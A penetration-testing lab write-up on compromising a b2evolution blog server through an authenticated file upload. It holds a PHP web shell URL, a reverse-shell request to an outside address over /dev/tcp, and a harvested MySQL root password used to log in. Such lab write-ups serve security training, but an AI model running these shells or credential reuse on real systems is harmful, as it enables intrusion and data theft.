WriteupsVHL — PMV02
WebMediumLinux
VHL — PMV02
b2evolution blog CMS on Ubuntu. Authenticated file manager abuse and PHP filter injection lead to remote code execution.
February 17, 2025Virtual Hacking Labs
#b2evolution#File Manager#PHP#RCE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 08:49 EST
Nmap scan report for 10.11.1.156
Host is up (0.020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 78:b4:1f:1c:73:21:67:69:e2:6e:52:db:fe:b9:56:6d (RSA)
| 256 d5:54:39:35:a0:73:4e:27:45:e4:28:59:cc:1e:2f:3d (ECDSA)
|_ 256 d3:f8:1d:a0:a6:45:58:cb:35:43:19:c5:30:4f:16:99 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Homepage Title
|_Requested resource was http://10.11.1.156/index.php
|_http-generator: b2evolution 6.9.3-stable
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/17%OT=22%CT=1%CU=35904%PV=Y%DS=2%DC=I%G=Y%TM=67B3
OS:3E99%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O
OS:1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11N
OS:W7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 20.18 ms 10.11.1.156
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.54 secondsdirectory search
sh
feroxbuster --url http://10.11.1.156
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.11.1.156
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 0l 0w 0c http://10.11.1.156/ => http://10.11.1.156/index.php
301 GET 9l 28w 308c http://10.11.1.156/inc => http://10.11.1.156/inc/
301 GET 9l 28w 310c http://10.11.1.156/skins => http://10.11.1.156/skins/
301 GET 9l 28w 309c http://10.11.1.156/cron => http://10.11.1.156/cron/
301 GET 9l 28w 309c http://10.11.1.156/conf => http://10.11.1.156/conf/
301 GET 9l 28w 310c http://10.11.1.156/media => http://10.11.1.156/media/
301 GET 9l 28w 312c http://10.11.1.156/plugins => http://10.11.1.156/plugins/
301 GET 9l 28w 311c http://10.11.1.156/_cache => http://10.11.1.156/_cache/
301 GET 9l 28w 314c http://10.11.1.156/inc/tools => http://10.11.1.156/inc/tools/
301 GET 9l 28w 314c http://10.11.1.156/inc/users => http://10.11.1.156/inc/users/
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/phpbbimport.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_email.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_syslog.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_emailaddresscache.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_emailaddress.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/invitations.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/userfieldsgroups.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_system.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/userfields.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/registration.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/account_close.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/user.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/tools/model/_wp.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/links/model/_linkcache.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/links/views/_link_list.inc.php
200 GET 1l 7w 41c http://10.11.1.156/inc/links/views/_link_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_avatar.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_group.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_registration.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_groups.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_account_close_setting.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_report.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_userfields.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization_user_remove.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization_user.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_preferences.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_group.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_userfieldsgroup.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_deldata.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_crop.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_stats.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_display.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_advanced.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_admin.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_userfield.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_password.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_invitation.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_invitation.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_profile_visits.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_organization_user_edit.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_subscriptions.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_group_coll_perm.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_activity.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/users/views/_user_identity.form.php
301 GET 9l 28w 313c http://10.11.1.156/inc/cron => http://10.11.1.156/inc/cron/
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/_cron.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/cronjobs.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/views/_cronjob.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_cleanup_jobs.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_comment_notifications.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_activate_account_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_post_by_email.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_process_hitlog.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_antispam_poll.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_heavy_db_maintenance.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/views/_cronjob.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_prune_page_cache.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/model/_post_by_mail.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_comment_moderation_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_monthly_alert_old_contents.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_test.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/views/_cronjob_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_error_test.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_post_notifications.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_post_moderation_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_unread_message_reminder.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_prune_hits_sessions.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/model/_decode_returned_emails.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_prune_recycled_comments.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_decode_returned_emails.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_light_db_maintenance.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/model/_cronjob.class.php
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/_item_content.inc.php
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/access_requires_login.main.php
301 GET 9l 28w 317c http://10.11.1.156/media/shared => http://10.11.1.156/media/shared/
200 GET 7l 48w 260c http://10.11.1.156/skins/basic/item.css
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/access_denied.main.php
301 GET 9l 28w 316c http://10.11.1.156/media/users => http://10.11.1.156/media/users/
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/_item_feedback.inc.php
301 GET 9l 28w 316c http://10.11.1.156/inc/widgets => http://10.11.1.156/inc/widgets/
200 GET 1l 7w 41c http://10.11.1.156/inc/widgets/views/_widget_list.view.php
301 GET 9l 28w 320c http://10.11.1.156/inc/maintenance => http://10.11.1.156/inc/maintenance/
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/backup.ctrl.php
301 GET 9l 28w 315c http://10.11.1.156/inc/xmlrpc => http://10.11.1.156/inc/xmlrpc/
301 GET 9l 28w 314c http://10.11.1.156/inc/links => http://10.11.1.156/inc/links/
301 GET 9l 28w 317c http://10.11.1.156/inc/settings => http://10.11.1.156/inc/settings/
301 GET 9l 28w 314c http://10.11.1.156/inc/skins => http://10.11.1.156/inc/skins/
200 GET 1l 7w 41c http://10.11.1.156/inc/cron/jobs/_email_campaign.job.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/model/_generalsettings.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/model/_abstractsettings.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/views/_xmlrpc.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/settings/views/_eblog.form.php
301 GET 9l 28w 318c http://10.11.1.156/inc/dashboard => http://10.11.1.156/inc/dashboard/
200 GET 1l 7w 41c http://10.11.1.156/inc/dashboard/dashboard.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/dashboard/model/_dashboard.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/upgrade.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/sessions/goals.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/polls/_polls.init.php
200 GET 1l 7w 41c http://10.11.1.156/inc/polls/polls.ctrl.php
301 GET 9l 28w 312c http://10.11.1.156/locales => http://10.11.1.156/locales/
301 GET 9l 28w 316c http://10.11.1.156/skins/basic => http://10.11.1.156/skins/basic/
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/help.main.php
200 GET 1l 7w 201c http://10.11.1.156/skins/basic/img/icon_minipost.gif
200 GET 1l 7w 41c http://10.11.1.156/skins/basic/msgform.main.php
301 GET 9l 28w 316c http://10.11.1.156/media/blogs => http://10.11.1.156/media/blogs/
301 GET 9l 28w 321c http://10.11.1.156/media/blogs/home => http://10.11.1.156/media/blogs/home/
200 GET 1l 7w 41c http://10.11.1.156/inc/widgets/_widgets.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/widgets/views/_widget_list_available.view.php
301 GET 9l 28w 314c http://10.11.1.156/inc/items => http://10.11.1.156/inc/items/
200 GET 1l 7w 41c http://10.11.1.156/inc/items/item_types.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/item_tags.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/item_statuses.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/items.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_itemtypes.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_file_create_posts.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_itemtag.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_item_list_table.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_itemstatuses.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_item_history_compare.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/views/_item_expert.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/model/_itemlist.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/model/_itemcache.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/items/model/_itemtype.class.php
301 GET 9l 28w 319c http://10.11.1.156/_cache/plugins => http://10.11.1.156/_cache/plugins/
301 GET 9l 28w 319c http://10.11.1.156/_cache/general => http://10.11.1.156/_cache/general/
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/_maintenance.init.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/model/_maintenance.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/model/_backup.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/maintenance/model/_maintenance.install.php
200 GET 3292l 18005w 1537203c http://10.11.1.156/media/blogs/home/maritime-hotel-building-facade-87635.jpeg
301 GET 9l 28w 317c http://10.11.1.156/inc/sessions => http://10.11.1.156/inc/sessions/
301 GET 9l 28w 314c http://10.11.1.156/inc/polls => http://10.11.1.156/inc/polls/
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_coll_skin_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_coll_skin.view.php
301 GET 9l 28w 320c http://10.11.1.156/inc/skins/model => http://10.11.1.156/inc/skins/model/
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/model/_skincache.class.php
301 GET 9l 28w 310c http://10.11.1.156/htsrv => http://10.11.1.156/htsrv/
301 GET 9l 28w 320c http://10.11.1.156/inc/collections => http://10.11.1.156/inc/collections/
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/collections.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/coll_settings.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/_search.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/model/_blog.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/model/_blog.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_list.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_advanced.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_type.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_seo.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_general.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/views/_coll_plugin_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/collections/_demo_content.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_skin_list.view.php
301 GET 9l 28w 316c http://10.11.1.156/inc/locales => http://10.11.1.156/inc/locales/
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/_locale.funcs.php
200 GET 0l 0w 0c http://10.11.1.156/inc/locales/_pofile.class.php
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/locales.ctrl.php
301 GET 9l 28w 320c http://10.11.1.156/inc/skins/views => http://10.11.1.156/inc/skins/views/
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_skin_list_available.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_coll_sel_skin.view.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/views/_skin.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/skins/model/_skin.class.php
301 GET 9l 28w 327c http://10.11.1.156/_cache/plugins/tinymce => http://10.11.1.156/_cache/plugins/tinymce/
301 GET 9l 28w 317c http://10.11.1.156/inc/regional => http://10.11.1.156/inc/regional/
200 GET 1l 7w 41c http://10.11.1.156/inc/regional/countries.ctrl.php
301 GET 9l 28w 321c http://10.11.1.156/media/users/dave => http://10.11.1.156/media/users/dave/
200 GET 368l 2172w 163870c http://10.11.1.156/media/users/dave/dave.jpg
200 GET 302l 1705w 121351c http://10.11.1.156/media/users/paul/paul.jpg
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/translation.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/_locale_settings.form.php
200 GET 1l 7w 41c http://10.11.1.156/inc/locales/model/_translation.funcs.php
200 GET 1l 7w 41c http://10.11.1.156/inc/messaging/threads.ctrl.php
200 GET 1l 7w 41c http://10.11.1.156/inc/_core/_template.funcs.php
301 GET 9l 28w 311c http://10.11.1.156/xmlsrv => http://10.11.1.156/xmlsrv/
301 GET 9l 28w 311c http://10.11.1.156/_tests => http://10.11.1.156/_tests/
301 GET 9l 28w 316c http://10.11.1.156/_tests/temp => http://10.11.1.156/_tests/temp/
301 GET 9l 28w 319c http://10.11.1.156/_tests/install => http://10.11.1.156/_tests/install/
500 GET 0l 0w 0c http://10.11.1.156/_tests/classes/simpletest/EvoInstallUnitTestCase.class.php
301 GET 9l 28w 319c http://10.11.1.156/_tests/classes => http://10.11.1.156/_tests/classes/
301 GET 9l 28w 321c http://10.11.1.156/media/users/paul => http://10.11.1.156/media/users/paul/
301 GET 9l 28w 318c http://10.11.1.156/inc/messaging => http://10.11.1.156/inc/messaging/
301 GET 9l 28w 314c http://10.11.1.156/inc/_core => http://10.11.1.156/inc/_core/
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_11_1_156-1739884445.state ...
[##>-----------------] - 3m 75005/510443 13m found:194 errors:16213
[####>---------------] - 3m 7431/30000 47/s http://10.11.1.156/
[###>----------------] - 3m 4977/30000 31/s http://10.11.1.156/inc/
[#####>--------------] - 3m 8800/30000 55/s http://10.11.1.156/skins/
[###>----------------] - 3m 5907/30000 37/s http://10.11.1.156/cron/
[####>---------------] - 3m 6378/30000 40/s http://10.11.1.156/conf/
[###>----------------] - 3m 5953/30000 38/s http://10.11.1.156/media/
[####>---------------] - 3m 6401/30000 41/s http://10.11.1.156/media/users/
[###>----------------] - 3m 5341/30000 34/s http://10.11.1.156/plugins/
[###>----------------] - 3m 5797/30000 38/s http://10.11.1.156/_cache/
[####################] - 7s 30000/30000 4268/s http://10.11.1.156/inc/xmlrpc/ => Directory listing
[####################] - 7s 30000/30000 4262/s http://10.11.1.156/inc/xmlrpc/model/ => Directory listing
[####################] - 7s 30000/30000 4266/s http://10.11.1.156/inc/tools/ => Directory listing
[####################] - 7s 30000/30000 4267/s http://10.11.1.156/inc/links/ => Directory listing
[####################] - 7s 30000/30000 4262/s http://10.11.1.156/inc/users/ => Directory listing
[####################] - 7s 30000/30000 4273/s http://10.11.1.156/inc/tools/model/ => Directory listing
[####################] - 7s 30000/30000 4263/s http://10.11.1.156/inc/links/model/ => Directory listing
[####################] - 7s 30000/30000 4263/s http://10.11.1.156/inc/links/views/ => Directory listing
[####################] - 0s 30000/30000 243902/s http://10.11.1.156/inc/users/views/ => Directory listing
[##>-----------------] - 3m 3587/30000 23/s http://10.11.1.156/inc/skins/
[####################] - 0s 30000/30000 555556/s http://10.11.1.156/inc/cron/ => Directory listing
[####################] - 0s 30000/30000 405405/s http://10.11.1.156/inc/cron/model/ => Directory listing
[####################] - 0s 30000/30000 410959/s http://10.11.1.156/inc/cron/views/ => Directory listing
[####################] - 7s 30000/30000 4498/s http://10.11.1.156/inc/cron/jobs/ => Directory listing
[####################] - 7s 30000/30000 4271/s http://10.11.1.156/skins/basic/ => Directory listing
[##>-----------------] - 2m 3523/30000 24/s http://10.11.1.156/media/blogs/
[####################] - 0s 30000/30000 625000/s http://10.11.1.156/media/shared/ => Directory listing
[####################] - 7s 30000/30000 4002/s http://10.11.1.156/media/shared/global/ => Directory listing
[####################] - 7s 30000/30000 4270/s http://10.11.1.156/inc/widgets/ => Directory listing
[####################] - 7s 30000/30000 4272/s http://10.11.1.156/inc/widgets/views/ => Directory listing
[####################] - 0s 30000/30000 103806/s http://10.11.1.156/_cache/plugins/ => Directory listing
[##>-----------------] - 2m 3081/30000 21/s http://10.11.1.156/_cache/plugins/tinymce/
[####################] - 7s 30000/30000 4207/s http://10.11.1.156/inc/maintenance/ => Directory listing
[####################] - 0s 30000/30000 109890/s http://10.11.1.156/_cache/general/ => Directory listing
[####################] - 7s 30000/30000 4270/s http://10.11.1.156/inc/settings/ => Directory listing
[####################] - 1s 30000/30000 58140/s http://10.11.1.156/inc/settings/views/ => Directory listing
[####################] - 1s 30000/30000 58252/s http://10.11.1.156/inc/settings/model/ => Directory listing
[####################] - 0s 30000/30000 638298/s http://10.11.1.156/inc/dashboard/ => Directory listing
[####################] - 0s 30000/30000 666667/s http://10.11.1.156/inc/dashboard/model/ => Directory listing
[####################] - 7s 30000/30000 4269/s http://10.11.1.156/inc/sessions/ => Directory listing
[####################] - 7s 30000/30000 4267/s http://10.11.1.156/inc/polls/ => Directory listing
[#>------------------] - 2m 2770/30000 19/s http://10.11.1.156/locales/
[####################] - 0s 30000/30000 588235/s http://10.11.1.156/skins/basic/img/ => Directory listing
[####################] - 4s 30000/30000 7280/s http://10.11.1.156/media/blogs/home/ => Directory listing
[####################] - 0s 30000/30000 428571/s http://10.11.1.156/inc/items/ => Directory listing
[####################] - 7s 30000/30000 4267/s http://10.11.1.156/inc/items/views/ => Directory listing
[####################] - 7s 30000/30000 4251/s http://10.11.1.156/inc/items/model/ => Directory listing
[####################] - 7s 30000/30000 4511/s http://10.11.1.156/inc/maintenance/model/ => Directory listing
[####################] - 7s 30000/30000 4284/s http://10.11.1.156/inc/skins/views/ => Directory listing
[####################] - 7s 30000/30000 4271/s http://10.11.1.156/inc/skins/model/ => Directory listing
[>-------------------] - 2m 1423/30000 11/s http://10.11.1.156/htsrv/
[####################] - 7s 30000/30000 4269/s http://10.11.1.156/inc/collections/ => Directory listing
[####################] - 7s 30000/30000 4274/s http://10.11.1.156/inc/collections/model/ => Directory listing
[####################] - 7s 30000/30000 4260/s http://10.11.1.156/inc/collections/views/ => Directory listing
[####################] - 7s 30000/30000 4264/s http://10.11.1.156/inc/locales/ => Directory listing 80
sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Homepage Title
|_Requested resource was http://10.11.1.156/index.php
|_http-generator: b2evolution 6.9.3-stable
|_http-server-header: Apache/2.4.41 (Ubuntu)b2evolution version 6.9.3
b2evolution arbitrary file upload
- https://www.exploit-db.com/exploits/41011
- register user
- upload php file
- this folder could hold what uploaded for
testuser
http://10.11.1.156/media/users/test/comments/p20/shell.php?0=id
rev shell as www-data
sh
GET /media/users/test/comments/p20/shell.php?0=bash+-c+'bash+-i+>%26+/dev/tcp/172.16.1.2/1234+0>%261' HTTP/1.1sh
www-data@pm:/tmp$ uname -a
uname -a
Linux pm 5.4.0-122-generic #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
www-data@pm:/tmp$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.4 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.4 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focallinpeas
sh
╔══════════╣ Searching passwords in config PHP files
'password' => 'B2pMdatAB4sE22!', // ...and password
// $install_password = 'easy';
'password' => 'demopass', // ...and password
// $install_password = 'easy';
{ // Password doesn't match: turn off debug mode:sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-122-generic (buildd@lcy02-amd64-095) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #138-Ubuntu SMP Wed Jun 22 15:00:31 UTC 2022
Distributor ID: Ubuntu
Description: Ubuntu 20.04.4 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:* sh
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2config file
sh
www-data@pm:/var/www/html/conf$ cat _basic_config.php
$db_config = array(
'user' => 'root', // your MySQL username
'password' => 'B2pMdatAB4sE22!', // ...and password
'name' => 'b2evolution', // the name of the database
'host' => 'localhost', // MySQL Server (typically 'localhost')
);creds
root:B2pMdatAB4sE22!
mysql
sh
www-data@pm:/var/www/html/conf$ mysql -u root -p'B2pMdatAB4sE22!'sh
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| b2evolution |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.002 sec)
MariaDB [(none)]> use b2evolution
use b2evolution
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [b2evolution]> show tables;
show tables;
+----------------------------------------+
| Tables_in_b2evolution |
+----------------------------------------+
| evo_antispam__iprange |
| evo_antispam__keyword |
| evo_basedomains |
| evo_bloggroups |
| evo_blogs |
| evo_blogusers |
| evo_categories |
| evo_coll_favs |
| evo_coll_settings |
| evo_comments |
| evo_comments__prerendering |
| evo_comments__votes |
| evo_cron__log |
| evo_cron__task |
| evo_email__address |
| evo_email__campaign |
| evo_email__campaign_send |
| evo_email__log |
| evo_email__returns |
| evo_files |
| evo_filetypes |
| evo_global__cache |
| evo_groups |
| evo_groups__groupsettings |
| evo_hitlog |
| evo_hits__aggregate |
| evo_hits__aggregate_sessions |
| evo_i18n_original_string |
| evo_i18n_translated_string |
| evo_items__item |
| evo_items__item_settings |
| evo_items__itemtag |
| evo_items__prerendering |
| evo_items__status |
| evo_items__status_type |
| evo_items__subscriptions |
| evo_items__tag |
| evo_items__type |
| evo_items__type_coll |
| evo_items__type_custom_field |
| evo_items__user_data |
| evo_items__version |
| evo_items__votes |
| evo_links |
| evo_links__vote |
| evo_locales |
| evo_messaging__contact |
| evo_messaging__contact_groups |
| evo_messaging__contact_groupusers |
| evo_messaging__message |
| evo_messaging__prerendering |
| evo_messaging__thread |
| evo_messaging__threadstatus |
| evo_plugin_captcha_qstn_13_ip_question |
| evo_plugin_captcha_qstn_13_questions |
| evo_pluginevents |
| evo_plugins |
| evo_pluginsettings |
| evo_pluginusersettings |
| evo_polls__answer |
| evo_polls__option |
| evo_polls__question |
| evo_postcats |
| evo_regional__city |
| evo_regional__country |
| evo_regional__currency |
